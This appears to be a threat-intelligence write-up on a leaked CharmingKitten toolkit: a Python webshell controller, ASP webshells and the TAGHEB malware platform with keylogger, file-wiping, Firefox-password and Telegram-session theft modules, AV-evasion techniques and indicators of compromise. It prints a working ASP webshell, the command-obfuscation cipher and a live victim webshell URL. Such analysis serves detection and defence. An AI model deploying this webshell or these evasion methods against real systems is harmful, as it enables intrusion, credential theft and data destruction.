Skip to main content

Framework Overview

CharmingKitten developed a dedicated Python & Webshells Framework for managing compromised systems. The framework consists of:
  1. Python Command Interface - Attacker-side command management system
  2. Webshells - Victim-side command execution engines
  3. Communication Protocol - Custom encoding and header-based command delivery

Python Command Management Interface

The Python script (connect.py) provides an interactive shell interface for managing webshell-compromised systems.

Features

Interactive Command Line:
  • Tab completion for commands
  • Command history
  • Target selection menu
  • Custom encoding for command obfuscation
Supported Commands:
  • help - Display available commands
  • exit - Exit the current session
  • Any system command - Executed remotely on victim

Custom Encoding Scheme

The framework uses a character substitution cipher to obfuscate commands: 
def encode(input_string):
    en = rf"AB_CDEFG.HIJKLM!$%&*()?NOPQR-STUVWXYZabcdefghijklmnopqrstu=vwxyz0123456789/"
    de = rf"Qk3\afcPbYJTGywSv=0Egdx62X-NRVz!~$%_*()?Uq7os1ijFMuLOetCl98K5hBDn4.prWAHmIZ"
    translation_table = str.maketrans(en, de)
    encoded_string = input_string.translate(translation_table)
    return encoded_string
This encoding makes network traffic analysis more difficult and evades simple signature-based detection.

Target Configuration

The Python interface includes hardcoded victim targets: Example Target: 
TargetURL = "https://uniforms.flydubai.com/images/flash/test9/m0s.phto"
This indicates a compromise of FlyDubai (Dubai’s aviation company) infrastructure.

HTTP Communication

Commands are transmitted via HTTP headers: 
headers = {
    "Accept-Captcha": "am=JgAAgP7jP38JwxmUgBgbuF8P_Nmlh2EEBhzhIQOBCEgGdAeWqYD_xNXr3UBFH35AAgACOJqOmhmdA2KVQwAEsGJYhhEAAAAAAAAAAA",
    "Accept-Language": "whoami",
    "User-Agent": "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36"
}
Command Delivery:
  • Commands are placed in the Accept-Language header
  • Custom Accept-Captcha header may serve as authentication token
  • Response contains command output in HTTP response body

ASP Webshells

The framework includes multiple ASP webshells designed for IIS server deployment.

Core Webshell (webshell.asp)

Functionality: 
<% Set oScript = Server.CreateObject("WSCRIPT.SHELL")
Set oScriptNet = Server.CreateObject("WSCRIPT.NETWORK")
Set oFileSys = Server.CreateObject("Scripting.FileSystemObject")

Dim acceptLanguage
acceptLanguage = Request.ServerVariables("HTTP_ACCEPT_LANGUAGE")

If acceptLanguage <> "" Then
    thisDir = getCommandOutput("cmd /c" & acceptLanguage)
    Response.Write(thisDir)
Else
    Response.Status = "404 Not Found"
    Response.End
End If
%>
Key Features:
  • Executes commands passed via Accept-Language header
  • Returns 404 status if header is missing (stealth)
  • Executes arbitrary Windows commands via cmd /c
  • Minimal code footprint for reduced detection

Webshell Variants

The framework includes multiple webshell files:
  • webshell.asp - Basic command execution
  • m0s.asp - Variant with additional capabilities
  • file.asp - File management operations
  • rce5.py - Python-based remote code execution
  • RCE4.py - Alternative Python RCE implementation

TAGHEB System

The “TAGHEB System” (سامانه ثاقب) is a comprehensive Windows malware platform developed by Department 40.
TAGHEB (ثاقب) translates to “penetrating” or “piercing” in Persian, reflecting its purpose as a penetration tool.

Technical Documentation

The exposed technical documentation reveals a sophisticated multi-module malware system:

Architecture

Core Components:
  1. Main Module - Primary control program
  2. Keylogger Module (klg.dll) - Keyboard monitoring
  3. Ransomware Module (rns.dll) - File destruction capability
  4. Stealer Module (stler.dll) - Firefox password extraction
  5. Telegram Module (telg.dll) - Telegram session theft

Module Loading System

The malware uses a sophisticated module loading system: Encoded Modules:
  • Modules stored as .bin files on server
  • Hex-encoded to evade AV detection during transfer
  • Decoded on victim system to .dat files
  • Loaded via LoadLibrary() or rundll32.exe
Module Mapping: 
central.dat  → Updated main executable
creds.dat    → Firefox stealer module
lock.dat     → File destruction module
logging.dat  → Keylogger module
msg.dat      → Telegram module

Communication Architecture

TAGHEB supports both direct and relay-based C2: Direct Communication:
  • Agent connects directly to control panel server
Relay Communication:
  • Agent sends data to relay servers
  • Relay forwards to control panel
  • “Change home” capability for relay failover
Traffic Encryption:
  • All traffic encrypted with XOR cipher
  • String obfuscation using obfuscator.py script
  • Random timing intervals for beacon traffic

Keylogger Module

Supports Hebrew and English keyboard layouts: 
KeyboardHook = SetWindowsHookEx(WH_KEYBOARD_LL, keyboardHookProc, hInstance, NULL);
Capabilities:
  • Captures all keystrokes
  • Records active window titles
  • Encrypted storage on disk
  • Start/stop capability from control panel

Ransomware Module

Destructive file encryption capability: Operation:
  • Targets first and last few kilobytes of files
  • Randomized character replacement algorithm
  • Irreversible destruction
  • Excludes AV installation directories
AV Directory Exclusions:
  • BitDefender installation path
  • Kaspersky installation path
  • Other major AV products

Stealer Module

Extracts saved passwords from Firefox: Method:
  • Loads Firefox’s nss3.dll library
  • Uses PK11SDR_Decrypt() to decrypt passwords
  • Extracts from logins.json profile file
  • Supports Firefox 64-bit only

Telegram Module

Steals Telegram Desktop session files: Target Files:
  • D877F783D5D3EF8Cs - Session data
  • key_datas - Encryption keys
  • maps - Configuration file
Process:
  1. Searches disk for session files
  2. Base64 encodes file contents
  3. Transmits to C2 server
  4. Enables account takeover (without cloud password)

Anti-Virus Evasion Testing

The documents include extensive AV testing results, demonstrating systematic evasion development.

Tested AV Products

  • Microsoft Defender
  • Kaspersky
  • Avira
  • ESET
  • BitDefender
  • Others

FUD Techniques (Fully Undetectable)

The technical documentation describes multiple techniques used to evade AV detection:

1. Modular Architecture

Breaking malware into multiple files:
  • Main executable (.exe)
  • Plugin modules (.dll)
  • Reduces detection surface

2. String Storage as Arrays

In C++, storing strings as character arrays instead of string literals: 
// Harder to detect
char str[] = {'h','e','l','l','o'};

// Easier to detect  
string str = "hello";

3. String Obfuscation

Using obfuscator.py to shift characters: 
Original: "http://example.com"
Obfuscated: "a6RG<@8BHGRfXR@BI8R"

4. Avoiding Sensitive Operations

  • Minimal registry modifications
  • Reduced network connections
  • No process injection
  • Limited file system operations

5. BAT File Execution

Using .bat scripts as intermediary: 
timeout 3
start [main]
timeout 10
start rundll32 [module] snrProc
This indirection evades direct execution monitoring.

6. Module Encoding

Hex encoding modules during storage:
  • Stored as .bin files (hex-encoded)
  • Downloaded to victim
  • Decoded to .dat files (non-standard extension)
  • Avoids detection during download and storage

7. Traffic Encryption

XOR encryption of C2 traffic:
  • Prevents network signature detection
  • Makes traffic analysis difficult

Deployment Strategy

For different AV products, different execution methods: BitDefender & Kaspersky:
  • Use LoadLibrary() for module loading
Other AV Products:
  • Use rundll32.exe via BAT file

Real-World Victim Evidence

FlyDubai Compromise

The Python script reveals a successful compromise: Target: uniforms.flydubai.com
Webshell Path: /images/flash/test9/m0s.phto
Company: FlyDubai (UAE aviation company) This represents a significant compromise of aviation industry infrastructure.

Turkish Foreign Ministry (Cross-Reference)

As documented in the BellaCiao analysis, the webshell framework was also used against Turkish government infrastructure.

Training Materials

The documents include training programs for Department 40 operatives:
  • Technical malware development
  • AV evasion techniques
  • Target reconnaissance
  • Infrastructure management

Intelligence Value

This framework exposure provides:
  1. Detection Signatures - For identifying compromised systems
  2. TTPs - Tactics, techniques, and procedures for threat hunting
  3. Infrastructure Indicators - Domains, paths, and patterns
  4. Capability Assessment - Understanding attacker skill level
Organizations should scan web-accessible directories for files with unexpected extensions (.phto, .dat) and review IIS logs for suspicious Accept-Language header patterns.

Indicators of Compromise

File Indicators

/images/flash/test9/m0s.phto
central.dat
creds.dat
lock.dat
logging.dat
msg.dat
*.bin (in plugins directories)

Network Indicators

  • HTTP requests with encoded commands in Accept-Language header
  • Custom Accept-Captcha header values
  • XOR-encrypted C2 traffic

Behavioral Indicators

  • Webshells returning 404 for normal requests
  • rundll32.exe executing from temporary directories
  • Suspicious .bat files in system directories
  • Module files with .dat extension in unusual locations

Build docs developers (and LLMs) love

Get started for freeTalk to us